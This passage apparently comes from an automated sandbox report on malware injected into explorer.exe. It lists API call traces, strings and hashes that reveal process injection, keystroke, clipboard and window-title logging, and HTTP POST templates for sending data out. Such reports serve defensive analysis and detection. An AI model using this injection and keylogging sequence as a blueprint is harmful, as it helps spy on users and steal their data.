                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,001512D9,00000000,00000000,?,00000001), ref: 001529C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 21e72b4062f869762303fd0d7d87732191f61ac197bdbe0e6ac60b42694222f8
                                                                                                                          • Instruction ID: 36f2e54e57c15fbf15f6b1c5667d8e08a9316901f537aca88e14ea9a25d85062
                                                                                                                          • Opcode Fuzzy Hash: 21e72b4062f869762303fd0d7d87732191f61ac197bdbe0e6ac60b42694222f8
                                                                                                                          • Instruction Fuzzy Hash: 24A002B07D6300FAFD6997519D1FF152A189740F53F104144B31A7D5D056E4B640853D

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 183 1529ae-1529bc VirtualFree
                                                                                                                          APIs
                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,001513A4), ref: 001529B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1263568516-0
                                                                                                                          • Opcode ID: 41d11e5889725787d4880c49af93ab6caf830ef2bfa2a3506cfde154bb85223b
                                                                                                                          • Instruction ID: cc6a002c41528113d8d1fe0cc08d6304334f47617e0ebd3b9d234278b1190542
                                                                                                                          • Opcode Fuzzy Hash: 41d11e5889725787d4880c49af93ab6caf830ef2bfa2a3506cfde154bb85223b
                                                                                                                          • Instruction Fuzzy Hash: E2A00270790700B6ED7557205D0EF0966546740B43F2049447255AE4D049A5A1888A18

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00152724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,001529F3,-00000001,0015128C), ref: 00152731
                                                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 001518F4
                                                                                                                          • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0015192F
                                                                                                                          • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001519BF
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,00153638,00000016), ref: 001519E6
                                                                                                                          • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00151A0E
                                                                                                                          • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00151A1E
                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00151A38
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00151A40
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00151A4E
                                                                                                                          • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00151A55
                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00151A6B
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00151A72
                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00151A88
                                                                                                                          • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00151AB2
                                                                                                                          • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00151AC5
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00151ACC
                                                                                                                          • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00151AD3
                                                                                                                          • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00151AE7
                                                                                                                          • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00151AFE
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00151B0B
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00151B11
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00151B17
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00151B1A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                          • String ID: 0-gwP,gw$atan$ntdll$opera_shared_counter
                                                                                                                          • API String ID: 1066286714-1856671790
                                                                                                                          • Opcode ID: a8cb1eca1f039efb322560a2676822f0c853bd55536fe071afcbd7f090d98c91
                                                                                                                          • Instruction ID: ec8bcdfaf6af42dca227b71f4763b21e60e4cf6b7e42e918a7be394c4feb3b10
                                                                                                                          • Opcode Fuzzy Hash: a8cb1eca1f039efb322560a2676822f0c853bd55536fe071afcbd7f090d98c91
                                                                                                                          • Instruction Fuzzy Hash: CF617C71204345FFD311DF258C84E6BBBECEB89796F000519F9699B291D770DA488BA2

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 001527B5
                                                                                                                          • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 001527CD
                                                                                                                          • lstrlen.KERNEL32(?,00000000), ref: 001527D5
                                                                                                                          • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 001527E0
                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 001527FA
                                                                                                                          • wsprintfA.USER32 ref: 00152811
                                                                                                                          • CryptDestroyHash.ADVAPI32(?), ref: 0015282A
                                                                                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00152834
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                          • String ID: %02X
                                                                                                                          • API String ID: 3341110664-436463671
                                                                                                                          • Opcode ID: e1f09dccf21decb0aa61b73014345121e8e96a7139dd8030c8ba022cd41b482e
                                                                                                                          • Instruction ID: bc75d2af0dbc0b119f5a70d26e57c9bb1df71e770a83b6f94032bc2aa0505c18
                                                                                                                          • Opcode Fuzzy Hash: e1f09dccf21decb0aa61b73014345121e8e96a7139dd8030c8ba022cd41b482e
                                                                                                                          • Instruction Fuzzy Hash: 07113072900208FFDB119BA5DC88EEEBFBCEB48352F504065F925E6150D7714F959B60
                                                                                                                          APIs
                                                                                                                          • GetKeyboardState.USER32(?), ref: 00151652
                                                                                                                          • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0015167A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: KeyboardStateUnicode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3453085656-3916222277
                                                                                                                          • Opcode ID: 46a58feeda92eec4542475723bf5d4aff7ad5bcbe4ccdc6aad836ef1af2a1ede
                                                                                                                          • Instruction ID: 5491197f2e2db466625601ef761375b4a8420f85e4a3d34c96767aab6ecd164c
                                                                                                                          • Opcode Fuzzy Hash: 46a58feeda92eec4542475723bf5d4aff7ad5bcbe4ccdc6aad836ef1af2a1ede
                                                                                                                          • Instruction Fuzzy Hash: C601C432900609FBDB31CB12DD85BFB73BCAF05702F08401AED21EA450D7F0D9898AA1

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • RtlZeroMemory.NTDLL(00155013,0000001C), ref: 001513C8
                                                                                                                          • VirtualQuery.KERNEL32(001513AE,?,0000001C), ref: 001513DA
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0015140B
                                                                                                                          • GetCurrentProcessId.KERNEL32(00000004), ref: 0015141C
                                                                                                                          • wsprintfA.USER32 ref: 00151433
                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00151448
                                                                                                                          • GetLastError.KERNEL32 ref: 0015144E
                                                                                                                          • RtlInitializeCriticalSection.NTDLL(0015582C), ref: 00151465
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00151489
                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 001514A6
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 001514AF
                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 001514D0
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 001514D3
                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 001514F1
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0015150D
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00151514
                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 0015152A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                                                                          • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                                                                          • API String ID: 3628807430-1779906909
                                                                                                                          • Opcode ID: 02047df2945614e94b3f061cb7112e3928986de2842079132b03e0447fb2eab2
                                                                                                                          • Instruction ID: 6d6339c2546c423b7b2756a0178b8a5236394409b269fd25564b8e3e6b332133
                                                                                                                          • Opcode Fuzzy Hash: 02047df2945614e94b3f061cb7112e3928986de2842079132b03e0447fb2eab2
                                                                                                                          • Instruction Fuzzy Hash: E241D271600304FBD711AF65EC19E5B3BA9EB95793B004018FD228F691DB7599488BA0

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.NTDLL(0015582C), ref: 001516C4
                                                                                                                          • lstrlenW.KERNEL32 ref: 001516DB
                                                                                                                          • lstrlenW.KERNEL32 ref: 001516F3
                                                                                                                          • wsprintfW.USER32 ref: 00151743
                                                                                                                          • GetForegroundWindow.USER32 ref: 0015174E
                                                                                                                          • GetWindowTextW.USER32(00000000,00155850,00000800), ref: 00151767
                                                                                                                          • GetClassNameW.USER32(00000000,00155850,00000800), ref: 00151774
                                                                                                                          • lstrcmpW.KERNEL32(00155020,00155850), ref: 00151781
                                                                                                                          • lstrcpyW.KERNEL32(00155020,00155850), ref: 0015178D
                                                                                                                          • wsprintfW.USER32 ref: 001517AD
                                                                                                                          • lstrcatW.KERNEL32 ref: 001517C6
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0015582C), ref: 001517D3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                                                                          • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                                                                                          • API String ID: 2651329914-3371406555
                                                                                                                          • Opcode ID: 68ddd939d099c2428ad4197d6d4829e154535c95fbb021a01b7e5b151a47ffc9
                                                                                                                          • Instruction ID: 782793df83479614c051adcad28dce0b6f6739ec0cb37bb2498ae240c20af205
                                                                                                                          • Opcode Fuzzy Hash: 68ddd939d099c2428ad4197d6d4829e154535c95fbb021a01b7e5b151a47ffc9
                                                                                                                          • Instruction Fuzzy Hash: 4921B731500714FBD3222B3AEC99F2F3A59EB45BD77044024FC319F5A1DB219D8986B5

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00152603
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0015260B
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0015261B
                                                                                                                          • Thread32First.KERNEL32(00000000,0000001C), ref: 00152629
                                                                                                                          • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00152648
                                                                                                                          • SuspendThread.KERNEL32(00000000), ref: 00152658
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00152667
                                                                                                                          • Thread32Next.KERNEL32(00000000,0000001C), ref: 00152677
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00152682
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1467098526-0
                                                                                                                          • Opcode ID: a4604862919d555728a7940e9c6fbd06124860219b7c6b83b841aed4a9f7c9a5
                                                                                                                          • Instruction ID: c5a9e116002a90208200136a39fe5a992dcb03608b1b2cfd483d9cf591763e1c
                                                                                                                          • Opcode Fuzzy Hash: a4604862919d555728a7940e9c6fbd06124860219b7c6b83b841aed4a9f7c9a5
                                                                                                                          • Instruction Fuzzy Hash: 05118E32404300EFD7119F60AC4CA6FBFA4EF85793F040529FE669B590D7308A998BA3

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 296 1520a1-1520fc call 15240f call 152a09 call 15298a call 1524cc 305 152117-152123 296->305 306 1520fe-152115 296->306 309 152127-152129 305->309 306->309 310 1523fd-15240c call 1529eb 309->310 311 15212f-152166 RtlZeroMemory 309->311 315 1523f5-1523fc 311->315 316 15216c-152187 311->316 315->310 317 1521b9-1521cb 316->317 318 152189-15219a call 15243d 316->318 325 1521cf-1521d1 317->325 323 1521ad 318->323 324 15219c-1521ab 318->324 326 1521af-1521b7 323->326 324->326 327 1521d7-152233 call 15288d 325->327 328 1523e2-1523e8 325->328 326->325 336 152239-15223e 327->336 337 1523db 327->337 330 1523f1 328->330 331 1523ea-1523ec call 1529eb 328->331 330->315 331->330 338 152240-152251 336->338 339 152258-152286 call 152a09 wsprintfW 336->339 337->328 338->339 342 15229f-1522b6 339->342 343 152288-15228a 339->343 348 1522f5-15230f 342->348 349 1522b8-1522ee call 152a09 wsprintfW 342->349 344 15228b-15228e 343->344 346 152290-152295 344->346 347 152299-15229b 344->347 346->344 350 152297 346->350 347->342 354 152315-152328 348->354 355 1523b8-1523ce call 1529eb 348->355 349->348 350->342 354->355 359 15232e-152344 call 152a09 354->359 362 1523d7 355->362 363 1523d0-1523d2 call 1529eb 355->363 366 152346-152351 359->366 362->337 363->362 367 152365-15237c 366->367 368 152353-152360 call 1529ce 366->368 372 152380-15238d 367->372 373 15237e 367->373 368->367 372->366 374 15238f-152393 372->374 373->372 375 152395-1523a7 call 1529bd RtlMoveMemory 374->375 376 1523ad-1523b4 call 1529eb 374->376 375->376 376->355
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00152A09: GetProcessHeap.KERNEL32(00000008,0000A000,001510BF), ref: 00152A0C
                                                                                                                            • Part of subcall function 00152A09: RtlAllocateHeap.NTDLL(00000000), ref: 00152A13
                                                                                                                            • Part of subcall function 0015298A: lstrlen.KERNEL32(00154FE2,?,00000000,00000000,001520DD,774C8A60,00154FE2,00000000), ref: 00152992
                                                                                                                            • Part of subcall function 0015298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00154FE2,00000001,00000000,00000000), ref: 001529A4
                                                                                                                            • Part of subcall function 001524CC: RtlZeroMemory.NTDLL(?,00000018), ref: 001524DE
                                                                                                                          • RtlZeroMemory.NTDLL(?,0000003C), ref: 00152139
                                                                                                                          • wsprintfW.USER32 ref: 00152272
                                                                                                                          • wsprintfW.USER32 ref: 001522DD
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 001523A7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                          • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                          • API String ID: 4204651544-1701262698
                                                                                                                          • Opcode ID: 63c389fe2ecb63b3e9c1660a4ccc7c1323c1ad9e7a5e1f278616ee7106041c12
                                                                                                                          • Instruction ID: 710b21c2e6c8245f6a093b55932e2f64e752382f29e250588d460367499626cf
                                                                                                                          • Opcode Fuzzy Hash: 63c389fe2ecb63b3e9c1660a4ccc7c1323c1ad9e7a5e1f278616ee7106041c12
                                                                                                                          • Instruction Fuzzy Hash: BBA16D72608740EFD3509F68D884A2BBBE8FB89785F04082DF9A5DB351DB74DD488B52

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 381 1512ae-1512bf 382 1512c5-1512c7 381->382 383 1513a6-1513ad 381->383 382->383 384 1512cd-1512fc call 1529bd lstrlen call 152a09 382->384 389 15136e-151377 call 1529eb 384->389 390 1512fe-151327 call 152841 RtlZeroMemory 384->390 395 15139d-1513a5 call 1529ae 389->395 396 151379-15137d 389->396 397 151353-151369 RtlMoveMemory call 152569 390->397 398 151329-15134f RtlMoveMemory call 152569 390->398 395->383 400 15137f-151392 call 15255c PathMatchSpecA 396->400 397->389 398->390 406 151351 398->406 408 151394-151397 400->408 409 15139b 400->409 406->389 408->400 410 151399 408->410 409->395 410->395
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 001529BD: VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,001512D9,00000000,00000000,?,00000001), ref: 001529C7
                                                                                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 001512DC
                                                                                                                            • Part of subcall function 00152A09: GetProcessHeap.KERNEL32(00000008,0000A000,001510BF), ref: 00152A0C
                                                                                                                            • Part of subcall function 00152A09: RtlAllocateHeap.NTDLL(00000000), ref: 00152A13
                                                                                                                          • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0015138A
                                                                                                                            • Part of subcall function 00152841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00151119,00000001), ref: 00152850
                                                                                                                            • Part of subcall function 00152841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00151119,00000001), ref: 00152855
                                                                                                                          • RtlZeroMemory.NTDLL(00000000,00000104), ref: 00151316
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00151332
                                                                                                                            • Part of subcall function 00152569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0015136E), ref: 00152591
                                                                                                                            • Part of subcall function 00152569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0015259A
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0015135F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2993730741-0
                                                                                                                          • Opcode ID: 29e87a89bdcf5b11906d811c65442e15cc5bee79ce166ca0678be142273a3621
                                                                                                                          • Instruction ID: b5da5d170fd854c3d8880e239f7c6f673950ba63dae47a816c17fa7c396bd50c
                                                                                                                          • Opcode Fuzzy Hash: 29e87a89bdcf5b11906d811c65442e15cc5bee79ce166ca0678be142273a3621
                                                                                                                          • Instruction Fuzzy Hash: 66218C71704301EB8345EF2898A5A7EB79ABB94722B10052EFC72DB641DB34DD4D8A62

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 411 151581-151592 413 151624-151628 411->413 414 151598-15159b 411->414 415 1515a7-1515b3 GlobalLock 414->415 416 15159d-1515a0 414->416 418 1515b5-1515b9 415->418 419 151623 415->419 416->415 417 1515a2-1515a5 416->417 417->413 417->415 420 1515e9 418->420 421 1515bb-1515be 418->421 419->413 424 1515eb-1515f2 call 15293e 420->424 422 1515e4-1515e7 421->422 423 1515c0-1515c3 421->423 422->424 425 1515c5-1515e2 lstrlenW call 152a09 lstrcatW 423->425 426 1515f4-1515fd call 152724 423->426 424->426 425->426 433 1515ff-151608 lstrlenW 426->433 434 15161b-151622 GlobalUnlock 426->434 433->434 435 15160a-15160e 433->435 434->419 436 15160f call 1516b9 435->436 437 151614-151616 call 1529eb 436->437 437->434
                                                                                                                          APIs
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 001515A9
                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 001515C6
                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 001515DC
                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 00151600
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0015161C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Globallstrlen$LockUnlocklstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1114890469-0
                                                                                                                          • Opcode ID: 4cb829dee499ebc10873fd705285c0b6845a863a8246cfccad004a19da0a7924
                                                                                                                          • Instruction ID: 3e3872fd8525e3d11e3775e78b610e7cc4c8f501fa4ad84be29f5a9c04adac15
                                                                                                                          • Opcode Fuzzy Hash: 4cb829dee499ebc10873fd705285c0b6845a863a8246cfccad004a19da0a7924
                                                                                                                          • Instruction Fuzzy Hash: D401E132A00211FB862767796C987BE62AE9BE7353B084129FC369F251EF748D4E4250
                                                                                                                          APIs
                                                                                                                          • RtlMoveMemory.NTDLL(?,?,?), ref: 00151BF4
                                                                                                                          • LoadLibraryA.KERNEL32(?,00155848,00000000,00000000,774D2EE0,00000000,001519B6,?,?,?,00000001,?,00000000), ref: 00151C1C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00151C49
                                                                                                                          • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00151C9A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3827878703-0
                                                                                                                          • Opcode ID: d8499b2a1fe2f303b891e3f79f62752bac885b909efac59f3d6af44e378e148e
                                                                                                                          • Instruction ID: 48f112104f56b443d9745dd30bbc0c75c5e65a26268bc01f11f2b850180472ce
                                                                                                                          • Opcode Fuzzy Hash: d8499b2a1fe2f303b891e3f79f62752bac885b909efac59f3d6af44e378e148e
                                                                                                                          • Instruction Fuzzy Hash: A631CE71640212FBCB1ACF29C8C4B66B7A8BF15316B15452CEC66CF640D732E849DBA0
                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.NTDLL(0015582C), ref: 00151839
                                                                                                                          • lstrlenW.KERNEL32 ref: 00151845
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0015582C), ref: 001518A9
                                                                                                                          • Sleep.KERNEL32(00007530), ref: 001518B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2134730579-0
                                                                                                                          • Opcode ID: f891cfa0275cc57ba454404847f686ec34f1996253a198ea09c2c2c41daf7c8f
                                                                                                                          • Instruction ID: ef00ffc34f2f048606fb1ccb827fbc5a33f28e35fc781a36824d19703fadf822
                                                                                                                          • Opcode Fuzzy Hash: f891cfa0275cc57ba454404847f686ec34f1996253a198ea09c2c2c41daf7c8f
                                                                                                                          • Instruction Fuzzy Hash: 6801DB31510700EBD7256765EC6953E3AAAEB427537100018F8218F7E1DF748D49DBA1
                                                                                                                          APIs
                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,001511DD), ref: 001526DB
                                                                                                                          • IsWow64Process.KERNEL32(000000FF,?), ref: 001526ED
                                                                                                                          • IsWow64Process.KERNEL32(00000000,?), ref: 00152700
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00152716
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 331459951-0
                                                                                                                          • Opcode ID: c8252480bd976e46c305f6a6e6dd0fbe5f88df05621c2168c64673105a27577d
                                                                                                                          • Instruction ID: 1d0a8d2e06c2038f58e8cc400d82bd78177f59396c3e746dc89d26d0ee3ef5e0
                                                                                                                          • Opcode Fuzzy Hash: c8252480bd976e46c305f6a6e6dd0fbe5f88df05621c2168c64673105a27577d
                                                                                                                          • Instruction Fuzzy Hash: F6F09672801318FF9B14CF909D448AEB77DDF09292B20025AF92097180D7304F4496A0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00152A09: GetProcessHeap.KERNEL32(00000008,0000A000,001510BF), ref: 00152A0C
                                                                                                                            • Part of subcall function 00152A09: RtlAllocateHeap.NTDLL(00000000), ref: 00152A13
                                                                                                                          • GetLocalTime.KERNEL32(?,00000000), ref: 001517F3
                                                                                                                          • wsprintfW.USER32 ref: 0015181D
                                                                                                                          Strings
                                                                                                                          • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 00151817
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001E.00000002.2534897824.0000000000151000.00000040.80000000.00040000.00000000.sdmp, Offset: 00151000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_30_2_151000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$AllocateLocalProcessTimewsprintf
